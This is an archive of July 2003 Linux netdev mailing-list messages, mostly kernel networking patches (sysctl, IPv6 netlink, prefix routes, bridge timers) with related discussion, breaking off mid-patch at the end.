This would be an opportunity to come in and the ground floor and make a difference. The Distributed File System Engineer will be a key contributor to the design and implementation of our scalable distributed file system. Must have experience in designing complex system software, operating system kernel development, RAID, and distributed lock management. The kernel engineers will be responsible for overall performance and stability of the their operating system kernel. Must be very familiar with Unix/Linux operating system kernel development, kernel debugging, performance analysis, and kernel fault containment. This is a kernel development position. If anyone you know may be interested in any of these opportunities, please contact me and have them forward an updated version of their resume. I would be glad to discuss the opportunity and the company further. Looking forward to hearing from you soon. Tiffany Goodyear Recruiting Consultant 408-858-7154 From davem@redhat.com Mon Jul 21 19:45:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 19:45:45 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6M2jaFl023507 for ; Mon, 21 Jul 2003 19:45:37 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id TAA05971; Mon, 21 Jul 2003 19:43:25 -0700 Date: Mon, 21 Jul 2003 19:43:24 -0700 From: "David S. Miller" To: "Tiffany Goodyear" Cc: netdev@oss.sgi.com Subject: Re: Looking for some Strong Engineers Message-Id: <20030721194324.430efdc3.davem@redhat.com> In-Reply-To: <012e01c34ff6$eee77080$6401a8c0@cablerocket.net> References: <012e01c34ff6$eee77080$6401a8c0@cablerocket.net> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4212 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev Using this list to solicit for employment is not appropriate. Please don't do it again. Thank you. From kaber@trash.net Tue Jul 22 08:34:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 08:35:02 -0700 (PDT) Received: from gw.localnet (port-212-202-53-133.reverse.qsc.de [212.202.53.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6MFYhFl020223 for ; Tue, 22 Jul 2003 08:34:51 -0700 Received: from ws.localnet ([192.168.0.23] helo=trash.net) by gw.localnet with esmtp (Exim 3.36 #1 (Debian)) id 19ez8h-0000Nm-00; Tue, 22 Jul 2003 17:33:19 +0200 Message-ID: <3F1D59B4.3080307@trash.net> Date: Tue, 22 Jul 2003 17:35:16 +0200 From: Patrick McHardy User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030704 Debian/1.4-1 X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" CC: netdev@oss.sgi.com Subject: [PATCH]: fix no_cong_thresh sysctl Content-Type: multipart/mixed; boundary="------------090200040508000909040906" X-archive-position: 4213 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kaber@trash.net Precedence: bulk X-list: netdev This is a multi-part message in MIME format. --------------090200040508000909040906 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Hi David, these two patches fix the net.core.no_cong_thresh sysctl, the value accessed is in fact no_cong. Best regards, Patrick --------------090200040508000909040906 Content-Type: text/plain; name="linux-2.4.21-sysctl_net_core-no_cong_thresh.diff" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="linux-2.4.21-sysctl_net_core-no_cong_thresh.diff" ===== net/core/sysctl_net_core.c 1.4 vs edited ===== --- 1.4/net/core/sysctl_net_core.c Wed Aug 7 18:17:09 2002 +++ edited/net/core/sysctl_net_core.c Tue Jul 22 16:50:29 2003 @@ -55,7 +55,7 @@ &netdev_max_backlog, sizeof(int), 0644, NULL, &proc_dointvec}, {NET_CORE_NO_CONG_THRESH, "no_cong_thresh", - &no_cong, sizeof(int), 0644, NULL, + &no_cong_thresh, sizeof(int), 0644, NULL, &proc_dointvec}, {NET_CORE_NO_CONG, "no_cong", &no_cong, sizeof(int), 0644, NULL, --------------090200040508000909040906 Content-Type: text/plain; name="linux-2.5.75-sysctl_net_core-no_cong_thresh.diff" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="linux-2.5.75-sysctl_net_core-no_cong_thresh.diff" ===== net/core/sysctl_net_core.c 1.4 vs edited ===== --- 1.4/net/core/sysctl_net_core.c Wed Apr 30 08:44:14 2003 +++ edited/net/core/sysctl_net_core.c Tue Jul 22 16:51:35 2003 @@ -86,7 +86,7 @@ { .ctl_name = NET_CORE_NO_CONG_THRESH, .procname = "no_cong_thresh", - .data = &no_cong, + .data = &no_cong_thresh, .maxlen = sizeof(int), .mode = 0644, .proc_handler = &proc_dointvec --------------090200040508000909040906-- From alan@storlinksemi.com Tue Jul 22 10:18:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 10:18:43 -0700 (PDT) Received: from smtp014.mail.yahoo.com (smtp014.mail.yahoo.com [216.136.173.58]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6MHIdFl024603 for ; Tue, 22 Jul 2003 10:18:39 -0700 Received: from adsl-63-203-236-74.dsl.snfc21.pacbell.net (HELO AlanLap) (alansuntzishih@63.203.236.74 with login) by smtp.mail.vip.sc5.yahoo.com with SMTP; 22 Jul 2003 17:18:38 -0000 From: "Alan Shih" To: Subject: FW: Limit skb to be less than 64K with TSO Date: Tue, 22 Jul 2003 10:18:32 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2727.1300 Importance: Normal X-archive-position: 4214 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alan@storlinksemi.com Precedence: bulk X-list: netdev I am lost at the following situation: Env: I am writing driver + smart NIC's firmware. The smart NIC has limited memory. It can do checksum and TSO but with 32K max. Problem: SKB may be 64K in size when it reaches the driver. I cannot push all 64K to the NIC to do checksum. Is there a way to limit the network stack to give me only 32K or smaller segments? If I do checksum in the main processor, it defeats the purpose. TIA Alan From krkumar@us.ibm.com Tue Jul 22 14:53:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 14:53:58 -0700 (PDT) Received: from e4.ny.us.ibm.com (e4.ny.us.ibm.com [32.97.182.104]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6MLrfFl007975 for ; Tue, 22 Jul 2003 14:53:48 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e4.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6MLqjwO148616; Tue, 22 Jul 2003 17:52:45 -0400 Received: from DYN318430.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6MLqf6f135122; Tue, 22 Jul 2003 17:52:42 -0400 Date: Tue, 22 Jul 2003 14:50:21 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: kuznet@ms2.inr.ac.ru cc: yoshfuji@linux-ipv6.org, , , , KK Subject: O/M flags against 2.6.0-test1 In-Reply-To: <200307210155.FAA31320@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4215 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev > I don't have any knowledge of using this new interface. Something like this. Thanks Alexey, I have modelled the inet6 code on this. Hope this looks good. IFLA_INET6_CONF (and IFLA_INET_CONF). How to encode the values? > Array of int's is simple, compact and looks good. But I have some > problem with it. What if one day we want to implement changing the > values? It will be nasty. I think this is the simplest method. For changing, isn't it possible to reverse the direction of memcpy back to the structure ? Ofcourse we need to make sure the values are legal, or that a 'get' was done prior to the 'put', which does make it nasty. Please let us to use some portable types instead of 'int' :-) I am using sizeof(struct xxx) or __u32, etc in the code, I guess you are ok with that. I didn't add the statistics, though it can be implemented : RTA_PUT(skb, IFLA_INET6_STATS, sizeof(idev->stats.icmpv6), &idev->stats.icmpv6[0]); RTA_PUT(skb, IFLA_INET6_STATS, sizeof(idev->stats.icmpv6), &idev->stats.icmpv6[1]); something like that would work ? Thanks, - KK ------------------------------------------------------------------------------ diff -ruN linux-2.6.0-test1.plist/include/linux/rtnetlink.h linux-2.6.0-test1.new/include/linux/rtnetlink.h --- linux-2.6.0-test1.plist/include/linux/rtnetlink.h 2003-07-22 13:59:17.000000000 -0700 +++ linux-2.6.0-test1.new/include/linux/rtnetlink.h 2003-07-22 10:50:42.000000000 -0700 @@ -477,10 +477,12 @@ #define IFLA_MASTER IFLA_MASTER IFLA_WIRELESS, /* Wireless Extension event - see wireless.h */ #define IFLA_WIRELESS IFLA_WIRELESS + IFLA_PROTINFO, +#define IFLA_PROTINFO IFLA_PROTINFO }; -#define IFLA_MAX IFLA_WIRELESS +#define IFLA_MAX IFLA_PROTINFO #define IFLA_RTA(r) ((struct rtattr*)(((char*)(r)) + NLMSG_ALIGN(sizeof(struct ifinfomsg)))) #define IFLA_PAYLOAD(n) NLMSG_PAYLOAD(n,sizeof(struct ifinfomsg)) @@ -514,6 +516,18 @@ for IPIP tunnels, when route to endpoint is allowed to change) */ +/* Sub-attribute types for IFLA_PROTINFO */ +enum +{ + IFLA_INET6_UNSPEC, + IFLA_INET6_FLAGS, /* link flags */ + IFLA_INET6_CONF, /* sysctl parameters */ + IFLA_INET6_STATS, /* statistics */ + IFLA_INET6_MCAST, /* MC things. What of them? */ +}; + +#define IFLA_INET6_MAX IFLA_INET6_MCAST + /***************************************************************** * Traffic control messages. ****/ diff -ruN linux-2.6.0-test1.plist/net/ipv6/addrconf.c linux-2.6.0-test1.new/net/ipv6/addrconf.c --- linux-2.6.0-test1.plist/net/ipv6/addrconf.c 2003-07-22 13:59:17.000000000 -0700 +++ linux-2.6.0-test1.new/net/ipv6/addrconf.c 2003-07-22 13:55:07.000000000 -0700 @@ -2510,7 +2510,77 @@ netlink_broadcast(rtnl, skb, 0, RTMGRP_IPV6_IFADDR, GFP_ATOMIC); } +static int inet6_fill_ifinfo(struct sk_buff *skb, struct net_device *dev, + struct inet6_dev *idev, + int type, u32 pid, u32 seq) +{ + struct ifinfomsg *r; + struct nlmsghdr *nlh; + unsigned char *b = skb->tail; + struct rtattr *subattr; + + nlh = NLMSG_PUT(skb, pid, seq, type, sizeof(*r)); + if (pid) nlh->nlmsg_flags |= NLM_F_MULTI; + r = NLMSG_DATA(nlh); + r->ifi_family = AF_INET6; + r->ifi_type = dev->type; + r->ifi_index = dev->ifindex; + r->ifi_flags = dev->flags; + r->ifi_change = 0; + if (!netif_running(dev) || !netif_carrier_ok(dev)) + r->ifi_flags &= ~IFF_RUNNING; + else + r->ifi_flags |= IFF_RUNNING; + + RTA_PUT(skb, IFLA_IFNAME, strlen(dev->name)+1, dev->name); + + subattr = (struct rtattr*)skb->tail; + RTA_PUT(skb, IFLA_PROTINFO, 0, NULL); + RTA_PUT(skb, IFLA_INET6_FLAGS, sizeof(__u32), &idev->if_flags); + /* + * XXX - any better way than using 'sizeof(struct) - n' below ? + * - stats/multicast not implemented + */ + RTA_PUT(skb, IFLA_INET6_CONF, sizeof(idev->cnf) - sizeof(void *), + &idev->cnf); + subattr->rta_len = skb->tail - (u8*)subattr; + + nlh->nlmsg_len = skb->tail - b; + return skb->len; + +nlmsg_failure: +rtattr_failure: + skb_trim(skb, b - skb->data); + return -1; +} + +static int inet6_dump_ifinfo(struct sk_buff *skb, struct netlink_callback *cb) +{ + int idx, err; + int s_idx = cb->args[0]; + struct net_device *dev; + struct inet6_dev *idev; + + read_lock(&dev_base_lock); + for (dev=dev_base, idx=0; dev; dev = dev->next, idx++) { + if (idx < s_idx) + continue; + if ((idev = in6_dev_get(dev)) == NULL) + continue; + err = inet6_fill_ifinfo(skb, dev, idev, RTM_NEWLINK, + NETLINK_CB(cb->skb).pid, cb->nlh->nlmsg_seq); + in6_dev_put(idev); + if (err <= 0) + break; + } + read_unlock(&dev_base_lock); + cb->args[0] = idx; + + return skb->len; +} + static struct rtnetlink_link inet6_rtnetlink_table[RTM_MAX - RTM_BASE + 1] = { + [RTM_GETLINK - RTM_BASE] = { .dumpit = inet6_dump_ifinfo, }, [RTM_NEWADDR - RTM_BASE] = { .doit = inet6_rtm_newaddr, }, [RTM_DELADDR - RTM_BASE] = { .doit = inet6_rtm_deladdr, }, [RTM_GETADDR - RTM_BASE] = { .dumpit = inet6_dump_ifaddr, }, From rudmer@legolas.dynup.net Tue Jul 22 15:06:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 15:06:11 -0700 (PDT) Received: from legolas.dynup.net (bv-n-3b5d.adsl.wanadoo.nl [212.129.187.93]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6MM66Fl008867 for ; Tue, 22 Jul 2003 15:06:07 -0700 Received: (qmail 14303 invoked from network); 22 Jul 2003 22:20:58 -0000 Received: from unknown (HELO gandalf.middle-earth.net) (192.168.20.2) by legolas.dynup.net with SMTP; 22 Jul 2003 22:20:58 -0000 From: Rudmer van Dijk To: Jeff Garzik , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [BK PATCHES] more 2.6.x net driver merges Date: Wed, 23 Jul 2003 00:06:15 +0200 User-Agent: KMail/1.5.2 References: <20030720043948.GA20201@gtf.org> In-Reply-To: <20030720043948.GA20201@gtf.org> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: <200307230006.15884.rudmer@legolas.dynup.net> X-archive-position: 4216 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: rudmer@legolas.dynup.net Precedence: bulk X-list: netdev Hi, I have a Broadcom Corporation BCM4401 100Base-T (rev 01) NIC, it did not work with 2.6-vanilla or 2.6-mm but with this patch it works! thanks! Rudmer On Sunday 20 July 2003 06:39, Jeff Garzik wrote: > Added some more stuff at > > bk pull bk://kernel.bkbits.net/jgarzik/net-drivers-2.6 > > Others may download the patch from > > ftp://ftp.??.kernel.org/pub/linux/kernel/people/jgarzik/patchkits/2.6/2.6.0 >-test1-netdrvr2.patch.bz2 > From yoshfuji@linux-ipv6.org Tue Jul 22 15:24:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 15:24:22 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6MMOCFl009956 for ; Tue, 22 Jul 2003 15:24:13 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6MMPkBo009657; Wed, 23 Jul 2003 07:25:46 +0900 Date: Tue, 22 Jul 2003 18:25:45 -0400 (EDT) Message-Id: <20030722.182545.97160275.yoshfuji@linux-ipv6.org> To: krkumar@us.ibm.com Cc: kuznet@ms2.inr.ac.ru, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Re: O/M flags against 2.6.0-test1 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <200307210155.FAA31320@dub.inr.ac.ru> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4217 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Tue, 22 Jul 2003 14:50:21 -0700 (PDT)), Krishna Kumar says: > I didn't add the statistics, though it can be implemented : > RTA_PUT(skb, IFLA_INET6_STATS, sizeof(idev->stats.icmpv6), > &idev->stats.icmpv6[0]); > RTA_PUT(skb, IFLA_INET6_STATS, sizeof(idev->stats.icmpv6), > &idev->stats.icmpv6[1]); > something like that would work ? I'd like to do this later, if you don't mind. --yoshfuji From krkumar@us.ibm.com Tue Jul 22 16:01:10 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 16:01:15 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6MN13Fl011842 for ; Tue, 22 Jul 2003 16:01:10 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e1.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6MN08Kb089562; Tue, 22 Jul 2003 19:00:09 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6MN05ou274710; Tue, 22 Jul 2003 19:00:06 -0400 Message-ID: <3F1DC1E3.4060504@us.ibm.com> Date: Tue, 22 Jul 2003 15:59:47 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: =?windows-1252?Q?YOSHIFUJI_Hideaki_/_=3F=3F=3F=3F?= CC: kuznet@ms2.inr.ac.ru, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Re: O/M flags against 2.6.0-test1 References: <200307210155.FAA31320@dub.inr.ac.ru> <20030722.182545.97160275.yoshfuji@linux-ipv6.org> In-Reply-To: <20030722.182545.97160275.yoshfuji@linux-ipv6.org> Content-Type: text/plain; charset=windows-1252; format=flowed Content-Transfer-Encoding: 8bit X-archive-position: 4218 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev I guess you are talking about the statistics part. This is fine with me. thx, - KK YOSHIFUJI Hideaki / ???? wrote: > In article (at Tue, 22 Jul 2003 14:50:21 -0700 (PDT)), Krishna Kumar says: > > >>I didn't add the statistics, though it can be implemented : >>RTA_PUT(skb, IFLA_INET6_STATS, sizeof(idev->stats.icmpv6), >> &idev->stats.icmpv6[0]); >>RTA_PUT(skb, IFLA_INET6_STATS, sizeof(idev->stats.icmpv6), >> &idev->stats.icmpv6[1]); >>something like that would work ? > > > I'd like to do this later, if you don't mind. > > --yoshfuji > From krkumar@us.ibm.com Tue Jul 22 16:55:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 16:55:45 -0700 (PDT) Received: from e5.ny.us.ibm.com (e5.ny.us.ibm.com [32.97.182.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6MNtXFl014856 for ; Tue, 22 Jul 2003 16:55:40 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e5.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6MNsj4X221368; Tue, 22 Jul 2003 19:54:45 -0400 Received: from DYN318430.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6MNsg6f076470; Tue, 22 Jul 2003 19:54:43 -0400 Date: Tue, 22 Jul 2003 16:52:24 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: kuznet@ms2.inr.ac.ru cc: yoshfuji@linux-ipv6.org, , Subject: [PATCH] Prefix List against 2.4.21 In-Reply-To: <200307210155.FAA31320@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4219 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev The same patch against 2.4.21. thanks, - KK ------------------------------------------------------------------------------ diff -ruN linux-2.4.21.org/include/linux/ipv6_route.h linux-2.4.21.new/include/linux/ipv6_route.h --- linux-2.4.21.org/include/linux/ipv6_route.h 1998-08-27 19:33:08.000000000 -0700 +++ linux-2.4.21.new/include/linux/ipv6_route.h 2003-07-22 15:08:07.000000000 -0700 @@ -25,6 +25,7 @@ #define RTF_DEFAULT 0x00010000 /* default - learned via ND */ #define RTF_ALLONLINK 0x00020000 /* fallback, no routers on link */ #define RTF_ADDRCONF 0x00040000 /* addrconf route - RA */ +#define RTF_PREFIX_RT 0x00080000 /* A prefix only route - RA */ #define RTF_NONEXTHOP 0x00200000 /* route with no nexthop */ #define RTF_EXPIRES 0x00400000 diff -ruN linux-2.4.21.org/include/linux/rtnetlink.h linux-2.4.21.new/include/linux/rtnetlink.h --- linux-2.4.21.org/include/linux/rtnetlink.h 2002-11-28 15:53:15.000000000 -0800 +++ linux-2.4.21.new/include/linux/rtnetlink.h 2003-07-22 15:08:35.000000000 -0700 @@ -167,6 +167,7 @@ #define RTM_F_NOTIFY 0x100 /* Notify user of route change */ #define RTM_F_CLONED 0x200 /* This route is cloned */ #define RTM_F_EQUALIZE 0x400 /* Multipath equalizer: NI */ +#define RTM_F_PREFIX 0x800 /* Prefix addresses */ /* Reserved table identifiers */ diff -ruN linux-2.4.21.org/net/ipv6/addrconf.c linux-2.4.21.new/net/ipv6/addrconf.c --- linux-2.4.21.org/net/ipv6/addrconf.c 2003-06-13 07:51:39.000000000 -0700 +++ linux-2.4.21.new/net/ipv6/addrconf.c 2003-07-22 15:13:53.000000000 -0700 @@ -101,7 +101,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -889,7 +889,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL); } @@ -916,7 +916,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1008,7 +1008,7 @@ } } else if (pinfo->onlink && valid_lft) { addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, - dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES); + dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES|RTF_PREFIX_RT); } if (rt) dst_release(&rt->u.dst); @@ -1054,7 +1054,7 @@ return; } - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF|RTF_PREFIX_RT); } if (ifp && valid_lft == 0) { @@ -1166,7 +1166,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1341,7 +1341,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1578,8 +1578,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1593,7 +1592,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1603,7 +1602,7 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); diff -ruN linux-2.4.21.org/net/ipv6/route.c linux-2.4.21.new/net/ipv6/route.c --- linux-2.4.21.org/net/ipv6/route.c 2003-06-13 07:51:39.000000000 -0700 +++ linux-2.4.21.new/net/ipv6/route.c 2003-07-22 15:15:56.000000000 -0700 @@ -1516,13 +1516,19 @@ struct in6_addr *src, int iif, int type, u32 pid, u32 seq, - struct nlmsghdr *in_nlh) + struct nlmsghdr *in_nlh, int prefix) { struct rtmsg *rtm; struct nlmsghdr *nlh; unsigned char *b = skb->tail; struct rta_cacheinfo ci; + if (prefix) { /* user wants prefix routes only */ + if (!(rt->rt6i_flags & RTF_PREFIX_RT)) { + /* success since this is not a prefix route */ + return 1; + } + } if (!pid && in_nlh) { pid = in_nlh->nlmsg_pid; } @@ -1603,10 +1609,17 @@ static int rt6_dump_route(struct rt6_info *rt, void *p_arg) { struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + struct rtmsg *rtm; + int prefix; + + rtm = NLMSG_DATA(arg->cb->nlh); + if (rtm) + prefix = (rtm->rtm_flags & RTM_F_PREFIX) != 0; + else prefix = 0; return rt6_fill_node(arg->skb, rt, NULL, NULL, 0, RTM_NEWROUTE, NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq, - NULL); + NULL, prefix); } static int fib6_dump_node(struct fib6_walker_t *w) @@ -1757,7 +1770,7 @@ fl.nl_u.ip6_u.saddr, iif, RTM_NEWROUTE, NETLINK_CB(in_skb).pid, - nlh->nlmsg_seq, nlh); + nlh->nlmsg_seq, nlh, 0); if (err < 0) { err = -EMSGSIZE; goto out_free; @@ -1783,7 +1796,7 @@ netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, ENOBUFS); return; } - if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh) < 0) { + if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh, 0) < 0) { kfree_skb(skb); netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, EINVAL); return; From shemminger@osdl.org Tue Jul 22 20:45:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 22 Jul 2003 20:45:42 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N3jWFl025997 for ; Tue, 22 Jul 2003 20:45:34 -0700 Received: from localhost.localdomain (build.pdx.osdl.net [172.20.1.2]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6N3jCI17634; Tue, 22 Jul 2003 20:45:12 -0700 Date: Tue, 22 Jul 2003 23:45:08 -0400 From: Stephen Hemminger To: davem@redhat.com, Steffen Klassert , Christian Mautner Cc: netdev@oss.sgi.com Subject: [PATCH] Fix bridge timer race Message-Id: <20030722234508.0af40e80.shemminger@osdl.org> Organization: OSDL X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4220 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev This should fix several startup/shutdown timer races in the bridge driver. Added some paranoia checks for dangling timers. diff -urN -X dontdiff linux-2.6.0-test1/net/bridge/br_device.c linux-2.5-bridge/net/bridge/br_device.c --- linux-2.6.0-test1/net/bridge/br_device.c 2003-07-20 19:21:47.000000000 -0400 +++ linux-2.5-bridge/net/bridge/br_device.c 2003-07-22 08:51:22.000000000 -0400 @@ -110,23 +110,38 @@ return -1; } +/* convert later to direct kfree */ +static void br_dev_free(struct 